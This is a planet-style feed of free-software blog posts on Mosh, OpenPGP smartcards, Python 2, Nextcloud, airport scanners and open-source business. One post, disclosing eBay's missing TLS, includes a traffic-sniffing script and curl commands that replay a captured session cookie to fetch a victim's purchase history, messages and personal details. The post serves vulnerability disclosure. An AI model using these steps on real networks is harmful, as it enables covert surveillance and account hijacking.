Planet Fellowship (en)

Saturday, 17 December 2016

Trying out Mosh – the Mobile Shell

Hook’s Humble Homepage | 22:37, Saturday, 17 December 2016

While browsing wikis, waiting for a new kernel to compile on my poor little old ARMv5 server, I stumbled upon Mosh.

On its home page we can find the following description:

Remote terminal application that allows roaming, supports intermittent connectivity, and provides intelligent local echo and line editing of user keystrokes.

Mosh is a replacement for SSH. It's more robust and responsive, especially over Wi-Fi, cellular, and long-distance links.

… but what it boils down to is this: if you even occasionally have to SSH over an unstable WLAN or a mobile connection, you should be using Mosh instead.

The syntax is very similar to OpenSSH's, and in fact Mosh runs on top of it: authentication happens over SSH, after which it switches to its own AES-encrypted State Synchronisation Protocol (SSP) over UDP. Thanks to this design, even if you lose the connection for a while, the session resumes just fine. It also hides network lag when typing and is in general very responsive.
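For anyone curious about the syntax, here are a couple of sketch invocations (alice@example.org and the port numbers are placeholders, not anything from this post):

```shell
mosh alice@example.org                      # authenticates over SSH, then switches to its own UDP protocol
mosh --ssh="ssh -p 2222" alice@example.org  # bootstrap over a non-standard SSH port
mosh -p 60001 alice@example.org             # pin the server-side UDP port, e.g. for firewall rules
```

If the network drops, the session simply shows a note in the top line and carries on once connectivity returns; there is nothing to restart.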

Mosh is great for logging into remote shells, but you will still need OpenSSH for scp and sftp, as Mosh is optimised for character-oriented (not bulk binary) transport. Which is perfectly fine.

This is one of those tools that when you first try it out you simply go “Dear $deity, finally! Why Whhhhyyyyy haven’t I used this before …so many needlessly lost hours with SSH timing out …oh, so many.”

hook out → coming soon: Armbian on Olimex Lime 2 to replace (most of) my current Gentoo on DreamPlug

Thursday, 15 December 2016

Starting to use the Fellowship Card

vanitasvitae's blog » englisch | 13:00, Thursday, 15 December 2016

I recently became a fellow of the FSFE and so I received a nice letter containing the FSFE fellowship OpenPGP smartcard.

After a quick visual examination I approved the card to be *damn cool*, even though the portrait orientation of the print still confuses me when I look at it. I especially like how optimistically many digits the membership number field has (we can do it!!!). What I don’t like is the non-HTTPS link at the bottom of the backside.

But how to use it now?

It took me some time to figure out what exactly that card is. The FSFE overview page about the fellowship card misses the information that this is an OpenPGP v2 card, which comes in handy when choosing key sizes later on. I still don’t know whether the card is version 2.0 or 2.1, but for my use case it doesn’t really matter. So, what exactly is a smart card and what CAN I actually do with it?

Well, OpenPGP is a system that allows you to encrypt and sign emails, files and other information. That was nothing new to me; what actually was new to me is the fact that the encryption keys can be stored somewhere other than on the computer or phone. That intrigued me. So why not jump right in and get some keys on there? – But where to plug it in?

My laptop has no smart-card slot, but there is that big ugly slit on one side that never really proved useful to me, simply because most peripherals I wanted to connect went over trusty USB. It’s an ExpressCard slot. I knew that there are extension cards that fit in there so that they aren’t in the way (like, e.g., a USB dongle would be). There must be smart-card readers in ExpressCard format, right? Right. And since I want to read mail on a train or bus, I find it convenient that the card reader vanishes inside my laptop.

So I went online and searched for ExpressCard smart-card readers. I ended up buying a Lenovo Gemplus smart-card reader for about 25€. Then I waited. After half an hour I asked myself whether that particular device would work well with GNU/Linux (I use Debian testing on my ThinkPad), so I did some research and reassured myself that there are free drivers. Nice!

While I waited for the card reader to arrive, I received another letter with my admin PIN for the card. Just for the record ;)

Some days later the smart-card reader arrived and I happily shoved it into the ExpressCard slot. I inserted the card and checked via

gpg --card-status

what’s on the card, but I got an error message (unfortunately I don’t remember exactly what it was) saying that there was no card available. So I did some more research, and it turns out I had to install the package

pcscd

to make it work. After the installation my smart card was detected, so I could follow the FSFE’s tutorial on how to use the card. I booted into a live Ubuntu that I had lying around, shut off the internet connection, realised that I needed to install pcscd there as well, reactivated the internet, installed pcscd and disconnected again. At that point I wondered what exact kind of OpenPGP card I had. Somewhere else (I forgot where) I read that the fellowship card is a version 2.0 card, so I could go full 4096-bit RSA. I generated some new keys, which took forever! While I did so, I wrote some nonsense stories into a text editor to generate enough entropy. It still took about 15 minutes for each key to generate (and a lot of nonsense!). What confused me was the process of removing the secret keys and adding them back later (see the tutorial).
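For reference, the on-card key generation that the tutorial walks through boils down to a short interactive session (modern GnuPG command names; the card and reader have to be present, so treat this as a sketch rather than something to paste blindly):

```shell
gpg --card-status        # confirm that the reader and card are detected
gpg --card-edit          # opens the interactive card shell:
#   gpg/card> admin      # enable admin commands (prompts for the admin PIN)
#   gpg/card> generate   # create signature, encryption and authentication keys on the card
```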

But I did it, and now I’m the proud owner of a fully functional OpenPGP smart card and reader. I had some smaller issues with an older GPG key, which I simply revoked (it was about time anyway), and now everything works as intended. I’m a little bit sad because nearly none of my contacts uses GPG/PGP, so I had to write mails to myself in order to test the card, but that feeling when the little window opens, asking me to insert my card and/or enter my PIN, makes up for everything :)

My main use case for the card became signing git commits, though. Via

git commit -S -m "message"

git commits can be signed with the card (this works with normal gpg keys without a card as well)! You just have to add your key’s fingerprint to your .gitconfig. Man, that really adds to the experience. Now every time I sign a commit, I feel as if my work is extremely important or I’m a top secret agent or something. I can only recommend it to everyone!
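The .gitconfig part amounts to two settings; the key ID below is the one from the end of this post, standing in for your own:

```shell
# Tell git which key to hand to gpg, and sign every commit by default
git config --global user.signingkey 0xA027DB2F3E1E118A
git config --global commit.gpgsign true
```

With commit.gpgsign set, a plain `git commit -m "message"` is signed without the -S flag, and `git log --show-signature` shows the verification result.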

Of course, I know that I might sound a little silly in the last paragraph, but nevertheless, I hope I could at least entertain somebody with my first experiences with the FSFE fellowship card. What I would add to the wish list for the next version of the card is a little field to note the last digits of the fingerprint of the key that’s stored on the card. That could be handy for remembering the fingerprint when there is no card reader available. It would also be quite nice if the card were usable in combination with smartphones, even though I don’t know how exactly that could be accomplished (maybe a USB connector on the card?)

Anyways, that’s the end of my first blog post. I hope you enjoyed it. Btw: my GPG key has the ID 0xa027db2f3e1e118a :)

Edit: This is a repost from October. In the meantime I have lost my admin PIN, because I generated it with KeePassX and did not click “accept” afterwards. That is a real issue that should be addressed by the developers, but that’s another story. I can still use the card, but I can’t change the keys on it, so some day I’ll have to order a new card.

vanitasvitae

Tuesday, 13 December 2016

Rename This Project

Paul Boddie's Free Software-related blog » English | 17:35, Tuesday, 13 December 2016

It is interesting how the CPython core developers appear to prefer to spend their time on choosing names for someone else’s fork of Python 2, with some rather expansionist views on trademark applicability, than on actually winning over Python 2 users to their cause, which is to make Python 3 the only possible future of the Python language, of course. Never mind that the much broader Python language community still appears to have an overwhelming majority of Python 2 users. And not some kind of wafer-thin, “first past the post”, mandate-exaggerating, Brexit-level majority, but an actual “that doesn’t look so bad but, oh, the scale is logarithmic!” kind of majority.

On the one hand, there are core developers who claim to be very receptive to the idea of other people maintaining Python 2, because the CPython core developers have themselves decided that they cannot bear to look at that code after 2020 and will not issue patches, let alone make new releases, even for the issues that have been worthy of their attention in recent years. Telling people that they are completely officially unsupported applies yet more “stick” and even less “carrot” to those apparently lazy Python 2 users who are still letting the side down by not spending their own time and money on realising someone else’s vision. But apparently, that receptivity extends only so far into the real world.

One often reads and hears claims of “entitlement” when users complain about developers or the output of Free Software projects. Let it be said that I really appreciate what has been delivered over the decades by the Python project: the language has kept programming an interesting activity for me; I still to this day maintain and develop software written in Python; I have even worked to improve the CPython distribution at times, not always successfully. But it should always be remembered that even passive users help to validate projects, and active users contribute in numerous ways to keep projects viable. Indeed, users invest in the viability of such projects. Without such investment, many projects (like many companies) would remain unable to fulfil their potential.

Instead of inflicting burdensome change whose predictable effect is to cause a depreciation of the users’ existing investments and to demand that they make new investments just to mitigate risk and “keep up”, projects should consider their role in developing sustainable solutions that do not become obsolete just because they are not based on the “latest and greatest” of the technology realm’s toys. If someone comes along and picks up this responsibility when it is abdicated by others, then at the very least they should not be given a hard time about it. And at least this “Python 2.8” barely pretends to be anything more than a continuation of things that came before, which is not something that can be said about Python 3 and the adoption/migration fiasco that accompanies it to this day.

Cloud Federation – Getting Social

English – Björn Schießle's Weblog | 10:45, Tuesday, 13 December 2016

Clouds getting Social

With Nextcloud 11 we continue to work on one of our hot topics: Cloud Federation. This time we focus on the social aspects. We want to make it as easy as possible for people to share their contact information; this enables users to find each other and start sharing. Therefore we extended the user profile in the personal settings. As the screenshot at the top shows, users can now add a wide range of information to their personal settings and define the visibility of each item by clicking on the small icon next to it.

Privacy first

Change visibility of personal settings

We take your privacy seriously. That’s why we provide fine-grained options to define the visibility of each personal setting. By default all new settings are private, and all settings which existed before keep the same visibility as in Nextcloud 10 and earlier. This means that the user’s full name and avatar will only be visible to users on the same Nextcloud server, e.g. through the share dialog. If enabled by the administrator, these values, together with the user’s email address, will be synced with trusted servers to allow users from trusted servers to share with each other seamlessly.

As shown in the screenshot on the right, we provide three levels of visibility: “Private”, “Contacts” and “Public”. Private settings are visible only to you; even users on the same server will not have access to them. The only exceptions are the avatar and the full name, because these are central data used throughout Nextcloud for activities, internal shares, etc. Settings set to “Contacts” will be shared with users on the same server and on trusted servers, as defined by the administrator of the Nextcloud server. Public data will be synced to a global, public address book.

Introducing the global address book

The best real-world equivalent of the global address book is a telephone directory. When getting a new phone number, people can choose to publish it together with their name and address in a public telephone directory so that other people can find them. The global address book follows the same pattern. By default nothing gets published to the global address book; data is synced only if the user sets at least one value in their personal settings to “Public”. In that case all the public data will be synced to the global address book together with the user’s Federated Cloud ID. Users can remove their data again at any time by simply setting their personal data back to “Contacts” or “Private”.

In order to use the global address book as a source for finding new people, the lookup needs to be enabled explicitly by the administrator in the “Federated Cloud Sharing” settings. For privacy reasons it is disabled by default. If enabled, the share dialog of Nextcloud will query the global address book every time a user wants to share a file or folder, and suggest people found there. In the future there might be a dedicated button to access the global address book, both for performance reasons and to make the feature more discoverable.

Future work

The global address book can return many results for a given name, so how do we know that we are sharing with the right person? To address this, we want to add the possibility to verify the user’s email address, website and Twitter handle in Nextcloud 12. As soon as this feature is implemented, the global address book will only return users for whom at least one personal setting is verified, and it will also visualise the verified data so that the user can use this information to pick the right person.

Further, I want to extend the meaning of “Contacts” in one of the next versions. The idea is that “Contacts” should not be limited to trusted servers but should include the user’s personal contacts. For example, data set to “Contacts” could be shared with every person with whom the user has already established at least one successful federated share, or with all contacts that have a Federated Cloud ID in the user’s personal address book. This way we will move slowly in the direction of a decentralised, federated social network based on the user’s address book. It will also enable users to easily push a new phone number or other personal data to all their friends and colleagues, things for which most people today use centralised, proprietary services such as so-called “business networks”.

Another interesting possibility opened up by the global address book is moving complete user accounts from one server to another. Provided the user has published at least some basic information in the global address book, they could use it to announce their move to another server. Other Nextcloud servers could find this information and make sure that existing federated shares continue to work.

Saturday, 10 December 2016

The Internet of Dangerous Auction Sites

Iain R. Learmonth | 21:25, Saturday, 10 December 2016

It might be that the internet era of fun and games is over, because the internet is now dangerous. – Bruce Schneier

Ok, I know this is kind of old news now, but Bruce Schneier gave testimony to the House of Representatives’ Energy & Commerce Committee about computer security after the Dyn attack. I’m including this quote because I feel it sets the scene nicely for what follows here.

Last week, I was browsing the popular online auction site eBay and I noticed that there was no TLS. For a moment I considered that maybe my traffic was being intercepted; surely there was no way that eBay, as a global company, would be deliberately putting users at risk in this way. I was wrong. There is not, and has never been, TLS for large swathes of the eBay site. In fact, the only places I’ve found TLS are the help pages and the card-entry forms (although it will give you back the last 4 digits of your card over a plaintext channel).

sudo apt install wireshark
# You'll want to allow non-root users to perform capture
sudo adduser `whoami` wireshark
# Log out and in again to assume the privileges you've granted yourself

What can you see?

The first thing I’d like to call eBay out on is a statement in their page about Cookies, Web Beacons, and Similar Technologies:

We don’t store any of your personal information on any of our cookies or other similar technologies.

Well, eBay, I don’t know about you, but to me my name is personal information. Ana, who investigated this with me, confirmed that her name was present in her cookie too when using her account. But to answer the question: you can see pretty much everything.

Using the Observer module of PATHspider, which is essentially a programmable flow meter, let’s take a look at what items users of the network are browsing:

sudo apt install pathspider

The following is a Python 3 script that you’ll need to run as root (for packet capture) and kill with ^C when you’re done, because I didn’t give it an exit condition:

import logging
import queue
import threading
import email
import re
from io import StringIO

import plt

from pathspider.observer import Observer

from pathspider.observer import basic_flow
from pathspider.observer.tcp import tcp_setup
from pathspider.observer.tcp import tcp_handshake
from pathspider.observer.tcp import tcp_complete

def tcp_reasm_setup(rec, ip):
    rec['payload'] = b''
    return True

def tcp_reasm(rec, tcp, rev):
    if not rev and tcp.payload is not None:
        rec['payload'] += tcp.payload.data
    return True

lturi = "int:wlp3s0" # CHANGE THIS TO YOUR NETWORK INTERFACE
logging.getLogger().setLevel(logging.INFO)
logger = logging.getLogger(__name__)
ebay_itm = re.compile(r"(?:item=|itm(?:/[^0-9][^/]+)?/)([0-9]+)")

o = Observer(lturi,
             new_flow_chain=[basic_flow, tcp_setup, tcp_reasm_setup],
             tcp_chain=[tcp_handshake, tcp_complete, tcp_reasm])
q = queue.Queue()
t = threading.Thread(target=o.run_flow_enqueuer,
                     args=(q,),
                     daemon=True)
t.start()

while True:
    f = q.get()
    # www.ebay.co.uk uses keep alive for connections, multiple requests
    # may be in a single flow
    requests = [x + b'\r\n' for x in f['payload'].split(b'\r\n\r\n')]
    for request in requests:
        if request.startswith(b'GET '):
            request_text = request.decode('ascii')
            request_line, headers_alone = request_text.split('\r\n', 1)
            headers = email.message_from_file(StringIO(headers_alone))
            if headers['Host'] != "www.ebay.co.uk":
                break
            itm = ebay_itm.search(request_line)
            if itm is not None and len(itm.groups()) > 0 and itm.group(1) is not None:
                logging.info("%s viewed item %s", f['sip'],
                             "http://www.ebay.co.uk/itm/" + itm.group(1))

Note: PATHspider’s Observer won’t emit a flow until it is completed, so you may have to close your browser for the TCP connection to be closed, as eBay does use Connection: keep-alive.
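The item-number pattern itself can be sanity-checked without any capture hardware; the two request lines below are made-up samples of the URL shapes the regular expression targets:

```shell
printf '%s\n' \
    'GET /itm/Some-Gadget/192045666116 HTTP/1.1' \
    'GET /ws/eBayISAPI.dll?ViewItem&item=161990905666 HTTP/1.1' |
    grep -oE '(item=|itm(/[^0-9][^/]+)?/)[0-9]+' |
    grep -oE '[0-9]+$'
# prints:
# 192045666116
# 161990905666
```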

If all is working correctly (if it was really working correctly, it wouldn’t be working because the connections would be encrypted, but you get what I mean…), you’ll see something like:

INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/192045666116
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/161990905666
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/311756208540
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/131911806454
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/192045666116

It is left as an exercise for the reader to map the IP addresses to users. You do, however, have the hint that the first name of the user is in the cookie.

This was a very simple example. You can also passively sniff the content of messages sent and received on eBay (though I’ll admit email has the same flaw in a large number of cases), and you can see the purchase history and cart contents when those screens are viewed. Ana also pointed out that when you browse for items at home, eBay may recommend similar items to you later, and those recommendations would then be visible to anyone viewing your traffic at your workplace.

Perhaps you want to see the purchase history but you’re too impatient to wait for the user to view the purchase history screen. Don’t worry, this is also possible.

Three researchers from the Department of Computer Science at Columbia University, New York published a paper earlier this year titled The Cracked Cookie Jar: HTTP Cookie Hijacking and the Exposure of Private Information. In this paper, they talk about hijacking cookies using packet capture tools and then using the cookies to impersonate users when making requests to websites. They also detail in this paper a number of concerning websites that are vulnerable, including eBay.

Yes, it’s 2016, nearly 2017, and cookie hijacking is still a thing.

You may remember Firesheep, a Firefox extension that could be used to hijack Facebook, Twitter, Flickr and other websites. It was released in October 2010 as a demonstration of the security risk that session hijacking poses to users of websites which only encrypt the login process and not the cookie(s) created during it. Six years later, eBay has still not listened.

So what is cookie hijacking all about? Let’s get hands-on. This time, instead of looking at the request line, look at the Cookie header and just dump it out. Something like:

print(headers['Cookie'])
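The Cookie header is just a semicolon-separated list of name=value pairs, so even a small shell pipeline shows what is in it; the header below is a made-up stand-in, not a real captured cookie:

```shell
COOKIE='nonsession=BAQAAAVfirstname%3DIain; dp1=bu1p/QEBfX0BAX19AQA**; npii=example'
printf '%s\n' "$COOKIE" | tr ';' '\n' | sed 's/^ *//' | cut -d= -f1
# prints the cookie names, one per line: nonsession, dp1, npii
```

Replayed verbatim, the full string is all an attacker needs, which is what the curl commands that follow demonstrate.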

Now you have the user’s cookie and you can impersonate that user. Store the cookie in an environment variable named COOKIE and…

sudo apt install curl
# Get the purchase history
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/PurchaseHistory > history.html
# Get the current cart contents
curl --cookie "$COOKIE" http://cart.payments.ebay.co.uk/sc/view > cart.html
# Get the current bids/offers
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/BidsOffers > bids.html
# Get the messages list
curl --cookie "$COOKIE" http://mesg.ebay.co.uk/mesgweb/ViewMessages/0 > messages.html
# Get the watch list
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/WatchList > watch.html

I’m sure you can use your imagination for more. One of my favourites is…

# Get the personal information
curl --cookie "$COOKIE" "http://my.ebay.co.uk/ws/eBayISAPI.dll?MyeBay&CurrentPage=MyeBayPersonalInfo&gbh=1&ssPageName=STRK:ME:LNLK" > personal.html

This one will give you the secret questions (but not the answers) and the last 4 digits of the registered card for a seller account. In the case of Mat Honan in 2012, the last 4 digits of his card number led to the loss of his Twitter account.

The techniques I’ve shown here do not seem to care where the request comes from. We tested using my cookie from Ana’s laptop and also from a server hosted in the US (our routing origin is in Germany, so this should perhaps have raised a red flag). I could not find any interface through which I could query my login history, so I’m not sure what it would have shown.

I’m not a security researcher, though I do work as an Internet engineering researcher. I’m publishing this because these vulnerabilities have already been disclosed in the paper I linked above, and I believe this is something that needs attention. Every time I pointed out to someone over the last week that eBay does not use TLS, they were surprised, and often horrified.

You might think that better validation of the source of the cookie would help, for instance rejecting requests that suddenly come from another country. But as long as attackers are on the path, they have the ability to create flows that impersonate the host at the network layer. The only real option is to encrypt the flow and provide a means of authenticating the server, which is exactly what TLS does.

You might think that such attacks may never occur, but active probes in response to passive measurements have been observed. I would think that having all these cookies floating around the Internet is really just an invitation for those cookies to be abused by some intelligence service (or criminal organisation). I would be very surprised if such ideas had not already been explored, if not implemented, on a large scale.

Please Internet, TLS already.

Tuesday, 06 December 2016

Rejection of voluntary naked scanner at airport

Matthias Kirschner's Web log - fsfe | 23:17, Tuesday, 06 December 2016

On my way to the OGP summit in Paris I experienced what happens when you decline the voluntary naked scanner/body scanner. There are signs before security saying that this scan is voluntary and that you should tell the security personnel if you do not want it. That is what I did, and here is my account of what happened at Berlin Schönefeld this morning.

Naked Scanner

I asked the first security officer which queue I have to use if I do not want to use the naked scanner (~7:25am). He said I have to use it. After I told him that the signs say it is voluntary, he explained to me that it is not really a naked scanner, and that they just see the contours of the body. We agreed that I would talk with the other officers who operate the machines.

After unpacking my laptop and liquids, I told the next security officer that I preferred the "manual treatment" (that is what they call it on the signs). He referred me to the colleague operating the machine. I was asked why I did not want it, and I said: because of data protection. Then I got the "manual control", which means that someone does the usual body massage. Afterwards they also tested my clothing for traces of explosives.

Then the second officer brought me to my luggage and asked me to unpack everything for another scan of my belongings. During that he asked me why I refused the "body scanner", and there was some back and forth. As always I stayed friendly the whole time, as I know that for the officers my behaviour meant more work, and that they are following orders. He explained to me that they just see the contours and nothing else. I told him that I do not trust what data about my body shape is saved or where it is stored. During the talk I also told him that what they see on their screens and what is saved to disk can be different things, and that just because they cannot access files from before does not mean those files are not stored.

In the talk he explained to me that they have to ask for the reasons why I am not doing the (see above: "voluntary") check, and evaluate whether those reasons are plausible or whether I am covering something up. Pregnancy or implants would be a plausible reason. When I asked about data protection, he said that is not a plausible reason, and that in such cases they would also have to ask the police to check you again.

After my luggage was scanned the second time and I had all my belongings back in the bag, they said they now had to do the testing for traces of explosives. I told them that I had already been checked for that, but they said that now my luggage would be checked. Well, so be it: another check, and I can assure you that I am now quite sure that neither I nor my belongings were in contact with explosives recently.

In the end the officer urged me to please inform myself about the scanner again, to prevent such long procedures in the future. Actually it was not that long; the procedure was over at ~7:45am. I wished them a nice day, left, and wrote this blog post. I have to say I am concerned that people have to justify declining something which is supposed to be voluntary.

Now preparing the meeting in Paris...


Update 2016-12-09 14:24: I received many interesting comments about this post, especially on the corresponding tweet and in the comments on the BoingBoing article. Thanks to all of you who shared their experience and ideas on the subject there or by e-mail.

Documenting DUCK

David Boddie - Updates (Full Articles) | 17:35, Tuesday, 06 December 2016

Having recently considered restarting work on my Dalvik compiler tools, I thought I should at least try and improve some of the documentation that accompanies the project, beginning with the example applications.

The examples are written in a Python-like language that I called Serpentine. Programs written in this language are syntactically valid Python source code, but they wouldn't run in a Python interpreter even if you had a set of replacement modules for all the Java and Android libraries. (As an aside, my brother wrote a partial set of compatibility modules for the Java standard library as part of his javaclass project many years ago.) The incompatibility between the languages is intentional. I wanted to be able to write programs that would be represented using as few virtual machine instructions as possible and, since the virtual machine is designed for a statically-typed language with primitive types, I was comfortable with imposing restrictions on how the language uses types to make the compilation process as simple as possible.

It would be possible to implement more dynamic, Python-like types on top of the primitive types but this could lead to inefficiencies at run-time or, at the very least, a more complicated compiler. Since the overall goal was to have a language that resembled Python enough to make Android programming familiar to a Python programmer, implementing all the semantic features of Python is not really a priority, especially since programmers have to face up to the platform APIs at some point.

Inline Documentation

One of the other areas where I decided to experiment with non-Python-like behaviour is the use of docstrings, the short text descriptions that follow the start of modules, classes and functions. These are handled specially by the standard Python parser so that they don't get mixed into the code that the CPython interpreter runs. However, when parsing code for other purposes, this can be a disadvantage. One thing I wanted to do was to interleave descriptive strings throughout a program and process them to create a document that combines text and source code. Having the docstrings stored separately from other nodes in the abstract syntax tree makes this processing more tedious, since we need to work out where the original strings were in the source code.

The Mercurial repository for the project is currently residing on Bitbucket, which is less than ideal from a Free Software perspective. However, we can take advantage of the service's Markdown support to automatically render files marked up in this language. Since Markdown tends to be supported by other services and tools, we are not locked into this service and could easily migrate the repository elsewhere, processing the documentation differently if required. Since Markdown is not so different to reStructuredText, we could even just generate documentation using Sphinx with not too much effort.

The end result is that inline text from the examples is interleaved with the source code to produce text in Markdown format. When the contents of the repository are viewed in a browser, this text is processed and rendered as regular HTML by the hosting service, making it easier to read about the examples provided with the compiler.

Although I haven't used this approach for the compiler itself, I think that it might be interesting to try it. The style of documentation I am used to writing is focused on how programmers use library APIs, but documenting the internal structure of a project is a different kind of task. Perhaps I'll experiment with a combination of the two approaches to try and get the best of both worlds.

Categories: Free Software, Android, Documentation

Saturday, 03 December 2016

Conquer the World with Open Source

Blog – Think. Innovation. | 15:38, Saturday, 03 December 2016

Last week I had the privilege and pleasure to do a talk at the Open Source Software and Hardware Congres (OSSH Event) in Den Bosch, The Netherlands. Since I got some positive reactions on this talk, I decided to write this Blog Post about it, containing the main points.

The organization asked me to talk about “earning money with Open Source”, a topic I have been talking about at several other conferences. However, this time I decided not to just focus on explaining various Open Source Revenue Models, but instead focus more on the disruptive global successes an Open Source Strategy can bring about. Hence the somewhat grandiose title of my talk: Conquer the World with Open Source.

In the talk I aimed at explaining how some very successful companies have done so by choosing the unconventional way, by having the guts to do it differently and adopting Open Source as a Strategy. What I mean by this is that Open Source forms a vital part of the Value Proposition of a company. This is opposed to merely regarding and using Open Source Software (and increasingly Hardware) as an alternative to Proprietary products for running your business.

Remark: most of the rest of the talks at OSSH were about the pros and cons of using Open Source Software in a regular business, including a lot about security-related matters. Interesting exceptions were the talk by RedHat about Internet of Things and by Smart Robotics about ROS Open Source Robotics.

My talk included three case studies of “Big Conquerors” from Open Source Software, three case studies of “Small Conquerors” from the upcoming Open Source Hardware movement, and some tips for those interested in becoming an Open Source Conqueror.

The Big Conquerors in Open Source Software

As the Innovation Model of Open Source was invented as a Software Development and Distribution practice and has been around for a long time, this is where the biggest successes can be found:

“Build a Multinational with Open Source” (RedHat)

RedHat has shown that building a multinational company is possible and its clients, employees and the entire community are benefiting from their success. This year (2016) RedHat will make over $2 billion revenue, being the first Open Source company to do so.

Starting in 1993, it now has 9300 employees and serves its customers in 35 countries. For those unfamiliar with the company: RedHat mainly provides support and services around Open Source Software like GNU/Linux, but also provides Cloud and IoT solutions, consultancy and training.

“Become Market Leader by adopting an Open Source Strategy” (Android)

About a decade ago (2007) Google released the first version of its Open Source operating system for smartphones: Android. Seeing the vastly growing market for mobile phones and particularly smartphones, Google decided it could not afford to be left out and chose an Open Source strategy.

The result: as Apple’s iOS started pushing away Palm, BlackBerry and Windows, the market leaders at the time, Android overtook iOS in just a couple of years. And at the moment almost 90% of all smartphones sold run on an Open Source OS, with GNU/Linux at the core.

However, some critical remarks can also be made about Google’s strategy for Android. Google is turning more and more of the apps that used to be Open Source into proprietary components of the OS, and through the Open Handset Alliance the company keeps a serious lock on all companies producing phones with Android and Google’s flagship apps like GMail, Google Play and Google Maps. Not so Open, actually: if a company produces phones with these flagship apps, it has to include ALL of them and is forbidden to produce phones that run a fork (another version) of Android.

“Make Global Impact by Open Sourcing your Product” (WordPress)

It was 2003 and the market of Content Management Systems (CMS) was still highly volatile and in tremendous development. In that time it was still normal to build your own (general purpose) CMS, or at least consider the possibility. WordPress changed that, by becoming the best CMS around and Open Sourcing it to make a global impact.

At the moment 25% of the top 10 million websites run WordPress and the ecosystem of premium themes, plug-ins, customizations and implementations is said to be a ‘Billion Dollar Ecosystem’, although it is very hard to calculate this number given the distributed non-centralized nature of Open Source.

The Software as a Service (SaaS) version of the CMS, wordpress.com, serves 76 million blogs. It is amazing how WordPress, or rather Automattic, the company behind the product, has been able to make all of this possible with just around 400 employees.

By comparison: Twitter has 10 times as many employees and Facebook 40 times.

The Small Conquerors in Open Source Hardware

Given the success of Open Source in Software, we now see ‘a transition from bits to atoms’ where this innovation model is being experimented with, being tested and eventually being re-invented to be compatible and successful with Hardware. Some very promising Open Source Hardware companies exist nowadays and we can learn a lot and get inspiration from these cases:

“Define the de-facto Standard” (Arduino)

A little over 10 years ago (2005) a group of researchers and university students in Italy were looking for a way to allow their students to quickly include electronics in their art projects. At that time one needed to be a trained embedded systems engineer and a software engineer if you wanted to do some more advanced things with electronics.

For this reason the group developed a small basic micro-controller board which could be easily connected and extended with modules. Furthermore, they built a program to be able to easily develop software for it, called an Integrated Development Environment (IDE).

The Arduino project was born and the group soon saw a huge demand for the product coming from everywhere. They decided to start producing and selling the Arduino products in larger quantities, expanding globally. Also, because all of the designs, documentation and code were Open Source, many clones came onto the market, hoping to be in the slipstream of this success.

Today Arduino is the de-facto standard for any educational, art, hobby and even professional electronics prototyping project, especially given the huge IoT hype. The Arduino project is believed to have made around €50 million in revenue to date, and the webshop Adafruit alone sells €250,000 in Arduino products each month. And note: these are the official, original or certified Arduino products, not the clones, which sell many times that.

“Disrupt the Supply Chain” (OpenDesk)

OpenDesk is an interesting case as it is trying to build an open platform for furniture, mainly desks and tables, where the client directly connects with the designer and maker. The idea is that only information is transported globally and the physical products are made locally by manufacturers called ‘makers’ using computer controlled machinery, like CNC Routers.

A client requests a desk to be made, and a request for proposal goes out to local makers. When the client decides to buy the product, a local maker builds it, and every party involved gets a piece of the financial pie: the designer, the platform, the channel and the maker are all paid a fair share.

OpenDesk calls itself the “IKEA of the 21st century”, but since the furniture price is a multiple of IKEA furniture, I think it is mainly an interesting experiment to figure out how to make this rather complicated Open Source platform model work.

A side note: the designers choose the license to share their work under and most of them choose to use a ‘non-commercial’ license, which means that most of OpenDesk’s designs are not Open Source.

“Overtake the Big Boys” (The Things Network)

A few years ago a conglomerate of multinational corporations decided to set a new standard for Machine to Machine (M2M) communications, to be able to service the upcoming Internet of Things industry. This conglomerate is called the LoRa Alliance and the communication protocol is released as an open standard.

Then in 2015 a small group of people in Amsterdam decided to take advantage of this openness and were able to set up a city-wide network in just six weeks, with a relatively small amount of investment. The initiative was a huge success and got tons of media attention: The Things Network (TTN) was born.

Now TTN defines itself as a distributed community-owned open source IoT network. The movement has expanded globally, forming local communities everywhere. At the moment the community spans 60 countries, with over 200 communities, having a total of 900 active gateways.

Their Kickstarter campaign, aiming to bring their own developed cheap hardware on the market, was a huge success, bringing in almost € 300,000, twice the intended amount.

Recently TTN announced a deal with Farnell, the global distributor of Raspberry Pi, to distribute their products as well. I think KPN and other corporations are jealously looking at what TTN has accomplished as a grass-roots open source movement and wish they had started this amazing concept.

Become an Open Source Conqueror

After reading about the successes of these six Open Source Conquerors, I hope you feel inspired to at least consider this unconventional approach to make your innovative idea a worldwide success! We can learn a lot by studying these companies, and in case you are still wondering:

“But how do I make money with Open Source?” here is a list of the options you have:

Sell or rent out physical products
Sell products and services made with Open Source products
Sell per-client installations and customizations
Sell the means to use Open Source
Sell education and consultancy
Sell proprietary premium products
Sell the franchise and certification
Organize events and sell tickets
Benefit from ‘open’-oriented subsidies and (research) grants
Start a foundation or consortium

Basically you sell products and services just as any traditional ‘closed’ company does, except that you cannot sell licenses to intellectual property such as patents. This list is an adaptation from Lars Zimmerman’s excellent article about the topic.

“Be Fair, do not OpenWash!”

When you are going for Open Source, I recommend you to do it properly and in a fair way. Do not market and promote “Open Source”, when it in fact is not. Stick to the widely accepted Open Source Software Definition by the Open Source Initiative and the Open Source Hardware Definition by the Open Source Hardware Association.

If you play tricks I call this “Openwashing” and it can and probably will explode in your face later on. A famous example of this is Makerbot, which several years ago was the market leader for desktop 3D Printers. They had a huge community, which helped them out in many ways and they were developing really innovative printers, completely Open Source. Then somebody decided to take all the ‘source’ (design files, schematics, etc.) and start a Crowdfunding campaign to have clones made in China.

Even though the campaign failed, it scared the Makerbot founders enough to make the unwise decision to take Makerbot proprietary. This caused outrage in the community and destroyed their brand. Combined with bringing several low-quality 3D Printers to market, the company is now marginalized and could very well cease to exist soon.

“Think Big, Act Small”

One final piece of advice for when you are starting out with an Open Source Strategy: “Think Big, Act Small”. Since you probably have little or no experience with the topic and with building a successful Open Source Business Model, start with small experiments and learn along the way.

Look for example at what Texas Instruments and Intel are doing in this regard: big corporations who dip their toes in the waters of Open Source.

